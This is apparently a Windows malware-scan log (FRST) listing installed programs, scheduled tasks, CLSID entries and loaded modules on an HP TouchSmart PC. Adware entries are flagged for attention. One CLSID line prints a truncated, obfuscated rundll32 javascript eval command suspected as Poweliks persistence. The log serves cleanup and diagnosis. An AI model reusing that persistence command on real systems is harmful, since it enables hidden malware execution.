DVD Menu Pack for HP TouchSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 4.1.4412 - Hewlett-Packard)
DVD Menu Pack for HP TouchSmart Video (x32 Version: 4.1.4412 - Hewlett-Packard) Hidden
Facebook for HP TouchSmart (HKLM-x32\...\{8AE50893-3A87-4439-9A57-942ED43F7189}) (Version: 1.1.0004 - Hewlett-Packard)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Farm Frenzy (x32 Version: 2.2.0.95 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Deskjet 3510 series Basic Device Software (HKLM\...\{0AB0989D-2EBF-4772-830A-B370E0D7ED71}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Deskjet 3510 series Help (HKLM-x32\...\{97C1C98D-6AE5-4C71-9B00-EBBD9E014450}) (Version: 28.0.0 - Hewlett Packard)
HP Deskjet 3510 series Product Improvement Study (HKLM\...\{2CFC157D-6224-4072-9732-54DD8C07F334}) (Version: 28.0.989.0 - Hewlett-Packard Co.)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP LinkUp (HKLM-x32\...\{DB3147AB-4024-4773-8EC0-A1FE5B44933D}) (Version: 2.01.028 - Hewlett-Packard)
HP Magic Canvas (HKLM-x32\...\{DDFDC9D6-4220-41F8-BF9A-8E7512C4EF52}) (Version: 5.1.15.0 - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard Company)
HP My Display TouchSmart Edition (HKLM-x32\...\{1F4DDC90-5923-4E49-A4C7-F3CCC954DCA0}) (Version: 1.06.004 - Portrait Displays, Inc.)
HP Notes (HKLM-x32\...\{86BAB08A-5E66-4C53-82E3-C1E91673C7CA}) (Version: 5.1.4231.26923 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Setup (HKLM-x32\...\{D35B72B6-F0E4-462B-BDEB-E08032B3B681}) (Version: 8.7.4747.3786 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.1.13880.3792 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{7F2A11F4-EAE8-4325-83EC-E3E99F85169E}) (Version: 10.1.1000 - Hewlett-Packard)
HP TouchSmart Browser (HKLM-x32\...\{7561C05C-FE30-4D0E-9B8D-5218734E3986}) (Version: 5.1.4167.12664 - Hewlett-Packard)
HP TouchSmart Bubble Wrap (HKLM-x32\...\{5BFFDDEB-AFD7-499F-BB13-7A6EAD927CDA}_is1) (Version: 1.0.0.0 - Hewlett-Packard)
HP TouchSmart Calendar (HKLM-x32\...\{2B38E0FA-D8A5-4EBF-A018-E3C1C8E7A2E2}) (Version: 5.1.4171.15168 - Hewlett-Packard)
HP TouchSmart Canvas (HKLM-x32\...\{00F15573-18BB-4FAD-A763-F29401609C2F}) (Version: 5.1.4160.26759 - Hewlett-Packard)
HP TouchSmart Clock (HKLM-x32\...\{692D3BE1-0BD9-4B4C-A974-CB2EAEA99304}) (Version: 5.1.3882.1 - Hewlett-Packard)
HP TouchSmart eBay (HKLM-x32\...\{F12C6162-10D4-444A-9182-05CC3DB2456E}) (Version: 1.0.4098.28440 - Hewlett-Packard)
HP TouchSmart Metric Converter (HKLM-x32\...\{D0661463-50F7-4A1E-83CB-37CC590589AE}_is1) (Version: 1.0.0.0 - Hewlett-Packard)
HP TouchSmart Music (HKLM-x32\...\InstallShield_{91A34181-9FAD-43AB-A35F-E7A8945B7E1C}) (Version: 4.2.5414 - Hewlett-Packard)
HP TouchSmart Photo (HKLM-x32\...\InstallShield_{C9DCE03F-8CB7-4146-A99C-0612D75177EA}) (Version: 4.2.5414 - Hewlett-Packard)
HP TouchSmart RecipeBox (HKLM-x32\...\{20714B53-FC73-4F9C-9687-49EB237D6FD7}) (Version: 3.0.3830.27730 - Hewlett-Packard)
HP TouchSmart Rss (HKLM-x32\...\{2F1EB600-5E67-4AAA-9D5F-84430CDA4E47}) (Version: 5.1.4170.22458 - Hewlett-Packard)
HP TouchSmart Spot (HKLM-x32\...\{3D171340-B528-42E0-92E4-BDA7AEEF6F32}_is1) (Version: 1.0.0.0 - Hewlett-Packard)
HP TouchSmart Tap Tap Bear (HKLM-x32\...\{A393CDFF-BEB8-48EA-990D-2EB35B311D23}_is1) (Version: 1.0.0.0 - Hewlett-Packard)
HP TouchSmart Tutorials (HKLM-x32\...\{858FCB65-7C6D-4BA4-AD80-A3CB3744CE09}_is1) (Version: 4.0.0.4 - Hewlett-Packard)
HP TouchSmart Twitter (HKLM-x32\...\{75781594-73D9-4D7B-997F-14D41BF1514D}) (Version: 3.0.4162.32190 - Hewlett-Packard)
HP TouchSmart Video (HKLM-x32\...\InstallShield_{F04BFADD-C8CA-4C86-8F20-B1D7F4F8C66C}) (Version: 4.2.5414 - Hewlett-Packard)
HP TouchSmart Weather (HKLM-x32\...\{52727E8B-5F72-4795-8BEA-4E1FF4BFA0D9}) (Version: 5.1.4184.10337 - Hewlett-Packard)
HP TouchSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 4.2.4214 - Hewlett-Packard)
HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.9.0.0 - Hewlett-Packard)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6349.0 - IDT)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.710 - Oracle)
Jewel Quest: The Sleepless Star - Collector's Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\...\Kobo) (Version: 1.6 - Kobo Inc.)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Mathematics (HKLM-x32\...\{4D090F70-6F08-4B60-9357-A1DFD4458F09}) (Version: 4.0 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Publisher 2010 Interactive Guide EN (HKLM-x32\...\{9E4071F0-F112-4AFE-9487-5F9D8A9F2179}) (Version: 1.2.1 - Microsoft)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Touch Pack for Windows 7 (HKLM-x32\...\{8FF90DB8-6DED-44A3-B182-244FEC09012F}) (Version: 1.0.40517.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.0 (HKLM-x32\...\{3898934B-05AE-41CD-96BE-70DA9BFBCE1F}) (Version: 3.0.11010.0 - Microsoft Corporation)
MotoHelper 2.0.45 Driver 5.0.0 (HKLM-x32\...\MotoHelper) (Version: 2.0.45 - Motorola)
MotoHelper MergeModules (x32 Version: 1.2.0 - Motorola) Hidden
Motorola Mobile Drivers Installation 5.0.0 (Version: 5.0.0 - Motorola Inc.) Hidden
Movie Theme Pack for HP TouchSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 4.1.4412 - Hewlett-Packard)
Movie Theme Pack for HP TouchSmart Video (x32 Version: 4.1.4412 - Hewlett-Packard) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mystery of Mortlake Mansion (x32 Version: 2.2.0.97 - WildTangent) Hidden
Namco All-Stars: PAC-MAN (x32 Version: 2.2.0.95 - WildTangent) Hidden
Nexon Game Manager (HKLM-x32\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version: - )
Norton 360 (HKLM-x32\...\N360) (Version: 21.6.0.32 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
P@H-Protocol (HKLM-x32\...\{CF594DB8-CFB0-45B4-86DA-8BB4AC0941F8}) (Version: 3.0.7.0 - Valassis)
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.54 - PDF Complete, Inc)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.95 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.5331 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.5331 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\...\{912CED74-88D3-4C5B-ACB0-132318649765}) (Version: 5.10.1217.0 - NewspaperDirect Inc.)
Print@Home (HKLM-x32\...\{123D4082-3194-4191-9139-067E9157C2B2}) (Version: 2.0.0 - Valassis Interactive Inc.)
QuickTime (HKLM-x32\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
Ralink 802.11n Wireless LAN Card (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 4.0.3.0 - Ralink)
Recovery Manager (x32 Version: 5.5.0.4320 - CyberLink Corp.) Hidden
Remote Graphics Receiver (HKLM-x32\...\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
RoxioNow Player (HKLM-x32\...\{0EDEB615-1A60-425E-8306-0E10519C7B55}) (Version: 1.9.5.103 - RoxioNow)
SDK (x32 Version: 2.26.005 - Portrait Displays, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Slingo Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
Strife (HKLM-x32\...\Strife) (Version: - S2 Games)
Strongvault Online Backup (HKLM-x32\...\{59DB31A9-BCB0-4985-ACA6-F6477C7BE367}) (Version: 2.1.4.0 - Strongvault) <==== ATTENTION
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.13 - TeamSpeak Systems GmbH)
TI Connect™ (HKLM-x32\...\{D06BA64C-4447-49B4-B99D-E85BEA9E1035}) (Version: 4.0.0.218 - Texas Instruments Inc.)
TSHostedAppLauncher (x32 Version: 5.1.15.0 - Hewlett-Packard) Hidden
Unturned (HKLM-x32\...\Steam App 304930) (Version: - Nelson Sexton)
Update for Zip Extractor (HKCU\...\DigitalSite) (Version: - ) <==== ATTENTION
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
UpdaterEX (HKCU\...\UpdaterEX) (Version: - UpdaterEX)
Vacation Quest - The Hawaiian Islands (x32 Version: 2.2.0.97 - WildTangent) Hidden
Virtual Villagers 5 - New Believers (x32 Version: 2.2.0.97 - WildTangent) Hidden
WildTangent Games App (HP Games) (x32 Version: 4.0.5.2 - WildTangent) Hidden
Windows Driver Package - Texas Instruments Inc. (SilvrLnk) USB (06/11/2009 1.0.0.0) (HKLM\...\EC3E466026556D3EB760B01C4772277614354E11) (Version: 06/11/2009 1.0.0.0 - Texas Instruments Inc.)
Windows Driver Package - Texas Instruments Inc. (TIEHDUSB) USB (09/02/2009 1.0.0.1) (HKLM\...\7511B29C86C398B4D11A0B0E4176CAD68D1B7057) (Version: 09/02/2009 1.0.0.1 - Texas Instruments Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
Zip Extractor Packages (HKCU\...\Zip Extractor Packages) (Version: - ) <==== ATTENTION
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-4081318669-4177893195-338242575-1000_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll No File
CustomCLSID: HKU\S-1-5-21-4081318669-4177893195-338242575-1000_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll No File
CustomCLSID: HKU\S-1-5-21-4081318669-4177893195-338242575-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
==================== Restore Points =========================
04-11-2014 22:37:33 Norton_Power_Eraser_20141104173727883
06-11-2014 22:50:14 Installed Java 7 Update 71
07-11-2014 01:37:27 Installed DirectX
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {053EB68B-B248-4898-B0A8-2884A7060BDF} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {0B47D01A-ED81-4817-ADF3-D3AE9F5E6E4B} - System32\Tasks\{028D6754-B91E-48E6-B4CD-B5C5FE824D0D} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {0BCB3C07-C97F-4E67-B673-621365ADE38C} - System32\Tasks\HPCeeScheduleForMOM-HP$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {0CD128F7-B0AD-4DD4-92F6-705BA1E7C470} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {125EE58B-3C6C-4590-BCBB-894D81EF5938} - System32\Tasks\{F7EBFBE8-77E6-4981-A199-E4A965F6B157} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {15878B61-AF81-4249-B655-F018212316EF} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000Core => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-10] (Facebook Inc.)
Task: {18F18FF1-FBBE-43B4-ABFB-6245D02A59F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2014-09-02] (Hewlett-Packard)
Task: {21CA088A-3E67-4C84-8199-938912387B35} - System32\Tasks\{D658EF69-9FFE-447C-B8F2-3646868E5B4A} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {21D5F145-7394-4387-A762-04754E894938} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
Task: {27766BCB-F76A-4A3F-AA0C-9EF476D7DABC} - System32\Tasks\MotoHelper Initial Update => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-01-27] ()
Task: {2A15F8E6-BFCB-4E2D-90B3-2FA745D30061} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {2F3C2752-636D-4A3A-8C74-BF2AFCA30E74} - System32\Tasks\Microsoft\Windows\TabletPC\InputPersonalization => C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe [2009-07-13] (Microsoft Corporation)
Task: {344E1280-C946-4765-9C96-A76284E1CF1F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-09-23] (Google Inc.)
Task: {36140706-C3F2-4019-9E3C-3604CE1EBCB5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN2CE1PKF3 => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2014-09-02] (Hewlett-Packard)
Task: {4CAB9C8B-7D20-4CBE-B1F6-9ABC6A766604} - System32\Tasks\MirageAgent => C:\Program Files (x86)\Hewlett-Packard\Media\Webcam\YCMMirage.exe [2011-05-30] (CyberLink)
Task: {4E70148D-FE35-4E64-8C20-4A58A356AEF9} - System32\Tasks\{B3F5CCDD-4D28-4A55-A6E8-EC035A66EA31} => Iexplore.exe http://ui.skype.com/...all?page=tsMain
Task: {54571A01-C109-4FE6-9E41-127BAABA24CB} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {5712A056-E48E-44D8-9390-0944FB0CC1BE} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {68929005-A5BB-441E-A42C-8180609CD9B0} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {6FD35F19-FD41-4980-AEDF-CA97E26324EA} - System32\Tasks\{C412F7C1-C691-4EFB-ADF0-5BEFDC15A9DE} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {7392A774-638B-41CA-BD18-2C74BE909A4B} - System32\Tasks\DigitalSite => C:\Users\MoM\AppData\Roaming\DigitalSite\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION
Task: {7F19D961-10C2-478C-B4AA-3893E8D4EB93} - System32\Tasks\RMCreator => C:\Program Files (x86)\Hewlett-Packard\Recovery\Reminder.exe [2011-07-20] (CyberLink)
Task: {81BD90AC-DF00-47E2-8739-FBBF08B954EF} - System32\Tasks\MotoHelper MUM => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-01-27] ()
Task: {86EDCF81-4DAB-4A15-9B02-E1F3F550253C} - System32\Tasks\HPCeeScheduleForMoM => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {9C48704B-A5C5-4C13-8676-213001294046} - System32\Tasks\{B23BCC20-3143-42BB-AEE7-28373E021FD9} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {9FF5CC1B-B2C4-497B-8082-E4C23ED75E34} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2014-09-02] (Hewlett-Packard)
Task: {A16E7047-EECC-4B17-8EF6-B8626D2422C8} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-09-23] (Google Inc.)
Task: {CCC439A5-A82B-4687-BC34-CFAB64B4D261} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-01-27] ()
Task: {D9FDB15A-D0F7-4E8C-8179-22A70CD8555D} - System32\Tasks\MotoHelper Update => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2011-01-27] ()
Task: {DCC95F2F-526C-40CF-912D-23CD15150599} - System32\Tasks\{CCB504FD-5FE8-4186-973E-917BD2827037} => C:\Riot Games\League of Legends\lol.launcher.exe [2013-05-07] ()
Task: {E5328370-9647-4E76-B421-584B14EF36F3} - System32\Tasks\HPCustParticipation HP Deskjet 3510 series => C:\Program Files\HP\HP Deskjet 3510 series\Bin\HPCustPartic.exe [2012-05-08] (Hewlett-Packard Co.)
Task: {E6E553EE-5EB1-46C1-B764-3EC00E6FC3B2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {F93F0394-522D-4FCF-9BB6-B74EEDA97C1D} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000UA => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-05-10] (Facebook Inc.)
Task: {FE7A952F-E09E-4B8F-80ED-5BC52928BB82} - System32\Tasks\Hewlett-Packard\HP Support Assistant\NetworkCheck => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_NetworkCheck.exe [2014-04-22] (Hewlett-Packard)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DigitalSite.job => C:\Users\MoM\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000Core.job => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-4081318669-4177893195-338242575-1000UA.job => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForMOM-HP$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\HPCeeScheduleForMoM.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Loaded Modules (whitelisted) =============
2011-01-27 16:13 - 2011-01-27 16:13 - 00226624 _____ () C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe
2011-01-27 16:13 - 2011-01-27 16:13 - 00673088 _____ () C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
2011-06-30 02:14 - 2011-06-30 02:14 - 00243712 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-03-14 16:20 - 2011-03-14 16:20 - 00098304 _____ () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-05-19 16:04 - 2014-05-19 16:04 - 00307712 _____ () C:\Users\MoM\AppData\Roaming\Curse Client\Bin\opus.dll
2014-05-19 16:05 - 2014-05-19 16:05 - 00437248 _____ () C:\Users\MoM\AppData\Roaming\Curse Client\Bin\WebRTC_CSharpWrapper.dll
2014-11-07 15:53 - 2014-11-07 15:53 - 00098816 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32api.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00110080 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\pywintypes27.dll
2014-11-07 15:53 - 2014-11-07 15:53 - 00364544 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\pythoncom27.dll
2014-11-07 15:53 - 2014-11-07 15:53 - 00045568 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_socket.pyd
